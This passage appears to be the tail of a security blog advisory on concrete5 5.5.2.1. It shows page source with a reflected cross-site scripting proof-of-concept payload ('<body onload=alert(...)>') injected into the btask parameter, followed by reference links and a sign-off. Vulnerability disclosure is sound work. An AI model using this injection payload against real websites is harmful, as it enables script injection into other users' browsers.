<script type="text/javascript" src="/www/concrete5.5.2.1/concrete/js/tiny_mce/tiny_mce.js?v=aa5e8ba94816af5cea082fa1b3a32500"></script>
<script type="text/javascript" src="/www/concrete5.5.2.1/index.php/tools/required/page_controls_menu_js?cID=121&cvID=&btask='';!--"<body onload=alert(12312312323)>=&{()}&ts=1335145603"></script>
</body>
(...)
"
[--------------------------------------------[
[ 4. More...
- http://hauntit.blogspot.com
- http://www.concrete5.org/
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[
Subscribe to:
Posts (Atom)